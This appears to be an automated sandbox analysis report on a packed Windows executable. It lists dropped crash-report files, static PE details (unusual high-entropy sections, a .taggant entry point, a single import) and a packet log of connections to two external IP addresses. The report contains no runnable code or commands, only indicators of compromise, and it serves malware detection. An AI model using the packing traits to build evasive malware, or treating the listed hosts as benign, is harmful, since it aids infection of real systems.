                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.4.8.<./.P.i.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER979A.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4594
                                                          Entropy (8bit):4.482212084040487
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsmJg77aI9NyWpW8VYIYm8M4JT5Fu+q8W8zUUzCAd:uIjf8I7fT7V4JGiYUzCAd
                                                          MD5:7A2897B9096DBE134B5FD40944C9F284
                                                          SHA1:1CA788F5E0A9DACD867B1466C86067A1CE3E6334
                                                          SHA-256:E8089D5D24236CE1DC6A36A2E941822C05646B5C00A6C910DD5095CB97F727C3
                                                          SHA-512:92FD717209B4EAA21AB8753AAB3A2B0D91255F4FE1BEF7E0C366814541CFC505F15E1A68CEA66A516FBAEADA8FBDC92490DBA2B245B9B8F8871C44DD40E7EFF3
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639767" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.421574671527228
                                                          Encrypted:false
                                                          SSDEEP:6144:sSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNm0uhiTw:XvloTMW+EZMM6DFyE03w
                                                          MD5:18B4143C546EEBA977CE81CB70BDFCA1
                                                          SHA1:02E53281EAABE8E7C11F705F754B86AEB359CCAB
                                                          SHA-256:E208CBBF5D9EC1F6DCA67985091021E6F46F6244FE71F2B26449843254CAA70A
                                                          SHA-512:339137FCC54C453F3543910D2B93CB9BCB6BB55EF832CEAE95499C1028FB6A51FDA768CCA03D9674200884B799704435F1A4A5114635E8B497E843EF40FB4839
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.@%..R................................................................................................................................................................................................................................................................................................................................................2/........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Entropy (8bit):7.983059112357185
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • VXD Driver (31/22) 0.00%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:5ZH9uXmzGP.exe
                                                          File size:4'485'120 bytes
                                                          MD5:35e2c99a2fed28f4148ef7f4c1431df4
                                                          SHA1:8b05aa4709fd09892238baa7a14f42d58dd58d14
                                                          SHA256:d01a1b39c935e182b6e4d6c2c15dfe35a59b086fe55bbea0338bc35626a1d3df
                                                          SHA512:e03cfe592504f165fdd3a04dc3293d2ac786c51b9b59f6ebc0560013aadde66bdfdcb3c93cd225b51cdff831050e1bfc94977ed761006f10a852fe132a6cebb8
                                                          SSDEEP:98304:S5OvmjO1EX69Kl29THDuBr/v20z3TpSYYfRvCFwt:zvmj8EKwAENz3VSRvJ
                                                          TLSH:FC26339D0E22FBEFD16571FFE01BD237BD2625034936BDB88AC5F940903192536D9A18
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...........pH...@..................................iE...@... ............................

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x109a000
                                                          Entrypoint Section:.taggant
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                          DLL Characteristics:DYNAMIC_BASE
                                                          Time Stamp:0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp 00007FFA6881E38Ah
                                                          cmovle eax, dword ptr [eax+eax+00h]
                                                          add byte ptr [eax], al
                                                          add cl, ch
                                                          add byte ptr [eax], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [edx+ecx], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          pushad
                                                          int1
                                                          jns 00007FFA6881E390h

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74705f0x73.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x7460000x1ac.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc984f40x10euhadjik
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc984a40x18euhadjik
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          0x10000x7450000x284c00ab20037ed4c06e6a5dfce2cf52b684b4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x7460000x1ac0x200703fa0fc62b76c1528bd2db5433dd288False0.580078125data4.565637092039164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .idata 0x7470000x10000x200e84636d45557e74dadd0f14f36394655False0.166015625data1.1471680400846989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          0x7480000x3920000x200d6a50396edd4b478e43bec3120943adfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          euhadjik0xada0000x1bf0000x1be80080c75be31d3c16d3fe87d3ab3205f4c4False0.9942390467525196data7.954343878891304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          fyvcfwgt0xc990000x10000x4005c2be1908f31720301fe9eaf0f64935eFalse0.81640625data6.3367478979169745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .taggant0xc9a0000x30000x22003d765eda03db0ea559e79522262f405bFalse0.058363970588235295DOS executable (COM)0.7002217992563645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_MANIFEST0xc985040x152ASCII text, with CRLF line terminators0.6479289940828402

                                                          Imports

                                                          DLLImport
                                                          kernel32.dlllstrcpy

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 20, 2024 16:44:40.142927885 CET49714443192.168.2.598.85.100.80
                                                          Dec 20, 2024 16:44:40.142980099 CET4434971498.85.100.80192.168.2.5
                                                          Dec 20, 2024 16:44:40.143098116 CET49714443192.168.2.598.85.100.80
                                                          Dec 20, 2024 16:44:40.156981945 CET49714443192.168.2.598.85.100.80
                                                          Dec 20, 2024 16:44:40.156997919 CET4434971498.85.100.80192.168.2.5
                                                          Dec 20, 2024 16:44:42.267329931 CET4434971498.85.100.80192.168.2.5
                                                          Dec 20, 2024 16:44:42.268014908 CET49714443192.168.2.598.85.100.80
                                                          Dec 20, 2024 16:44:42.268030882 CET4434971498.85.100.80192.168.2.5
                                                          Dec 20, 2024 16:44:42.270664930 CET4434971498.85.100.80192.168.2.5
                                                          Dec 20, 2024 16:44:42.270824909 CET49714443192.168.2.598.85.100.80
                                                          Dec 20, 2024 16:44:42.272675991 CET49714443192.168.2.598.85.100.80
                                                          Dec 20, 2024 16:44:42.272772074 CET4434971498.85.100.80192.168.2.5
                                                          Dec 20, 2024 16:44:42.285756111 CET49714443192.168.2.598.85.100.80
                                                          Dec 20, 2024 16:44:42.285768032 CET4434971498.85.100.80192.168.2.5
                                                          Dec 20, 2024 16:44:42.334300041 CET49714443192.168.2.598.85.100.80
                                                          Dec 20, 2024 16:44:43.036761045 CET4434971498.85.100.80192.168.2.5
                                                          Dec 20, 2024 16:44:43.036885977 CET4434971498.85.100.80192.168.2.5
                                                          Dec 20, 2024 16:44:43.036976099 CET49714443192.168.2.598.85.100.80
                                                          Dec 20, 2024 16:44:43.061289072 CET49714443192.168.2.598.85.100.80
                                                          Dec 20, 2024 16:44:43.061328888 CET4434971498.85.100.80192.168.2.5
                                                          Dec 20, 2024 16:44:44.613292933 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:44.733055115 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.733151913 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:44.734338045 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:44.853921890 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.853936911 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.853952885 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.854002953 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.854012012 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.854038954 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:44.854091883 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:44.854123116 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.854132891 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.854144096 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.854163885 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:44.854197979 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:44.854247093 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.854258060 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.854295015 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:44.973619938 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.973721981 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.973731995 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.973783970 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.973793983 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.973803043 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:44.973922968 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.017988920 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.018131971 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.134612083 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.134721041 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.181920052 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.302021980 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.302124023 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.506037951 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.510202885 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.719062090 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.720562935 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.720669031 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.840630054 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840643883 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840647936 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840651989 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840658903 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840662956 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840739965 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840749025 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840753078 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840786934 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.840806961 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840818882 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840827942 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840864897 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.840893030 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.840934038 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840945005 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840954065 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.840979099 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.840991020 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.841020107 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.841135025 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.841145992 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.841156960 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.841185093 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.841193914 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.841379881 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.841389894 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.841393948 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.841428995 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.841634989 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.841849089 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.841922045 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.841931105 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.842068911 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.842133999 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.842319012 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.842392921 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.885931015 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.961780071 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.961796999 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.961807013 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.961817026 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.961922884 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.961934090 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.961945057 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.961955070 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.961971045 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.961982012 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.961992025 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962002993 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962006092 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962018013 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962028027 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962038994 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962172985 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962182999 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962698936 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962707996 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962707043 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.962717056 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962723017 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962846994 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962858915 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962879896 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.962917089 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.962956905 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963016033 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963085890 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963095903 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963131905 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963241100 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963251114 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963366985 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963419914 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963430882 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963471889 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963512897 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963524103 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963617086 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963627100 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963635921 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963654995 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963668108 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963696957 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963761091 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963772058 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963875055 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963948011 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963959932 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.963973045 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.964121103 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.964131117 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:45.964489937 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:45.964632034 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.021372080 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.021620035 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.022017956 CET4972680192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.082518101 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.082542896 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.082597971 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.082608938 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.082696915 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.082707882 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.082731962 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.082823992 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.082835913 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.082860947 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.082936049 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.082948923 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083009005 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083019972 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083095074 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083106041 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083111048 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083230972 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083241940 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083251953 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083265066 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083324909 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083378077 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083456993 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083467007 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083537102 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083547115 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083555937 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083605051 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083615065 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083694935 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083731890 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083754063 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083795071 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083805084 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.083822966 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084121943 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084134102 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084146023 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084156036 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084177971 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084224939 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084239006 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084248066 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084255934 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084264994 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084285021 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084317923 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084327936 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084342003 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084363937 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084372044 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084387064 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084404945 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084456921 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.084532976 CET8049726185.121.15.192192.168.2.5
